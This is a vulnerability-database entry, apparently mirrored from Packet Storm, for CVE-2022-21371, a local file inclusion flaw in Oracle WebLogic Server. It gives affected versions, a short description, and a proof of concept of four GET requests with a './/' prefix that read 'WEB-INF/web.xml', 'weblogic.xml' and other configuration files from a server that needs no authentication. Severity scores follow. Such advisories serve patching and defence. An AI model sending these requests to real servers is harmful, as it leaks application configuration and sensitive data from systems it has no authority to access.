Lucene search
K

Oracle WebLogic Server 14.1.1.0.0 Local File Inclusion

🗓️ 27 Jan 2022 00:00:00Reported by Jonah TanType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 501 Views

Oracle WebLogic Server 14.1.1.0.0 Local File Inclusion vulnerabilit

Related
Code
`# Exploit Title: Oracle WebLogic Server 14.1.1.0.0 - Local File Inclusion  
# Date: 25/1/2022  
# Exploit Author: Jonah Tan (@picar0jsu)  
# Vendor Homepage: https://www.oracle.com  
# Software Link:  
https://www.oracle.com/middleware/technologies/weblogic-server-installers-downloads.html  
# Version: 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0  
# Tested on: Windows Server 2019  
# CVE : CVE-2022-21371  
  
# Description  
Vulnerability in the Oracle WebLogic Server product of Oracle Fusion  
Middleware (component: Web Container).  
Supported versions that are affected are 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0  
and 14.1.1.0.0.  
Easily exploitable vulnerability allows unauthenticated attacker with  
network access via HTTP to compromise Oracle WebLogic Server.  
Successful attacks of this vulnerability can result in unauthorized access  
to critical data or complete access to all Oracle WebLogic Server  
accessible data.  
  
# PoC  
GET .//META-INF/MANIFEST.MF  
GET .//WEB-INF/web.xml  
GET .//WEB-INF/portlet.xml  
GET .//WEB-INF/weblogic.xml  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

27 Jan 2022 00:00Current
7.7High risk
Vulners AI Score7.7
CVSS 25
CVSS 3.17.5
EPSS0.92331
SSVC
501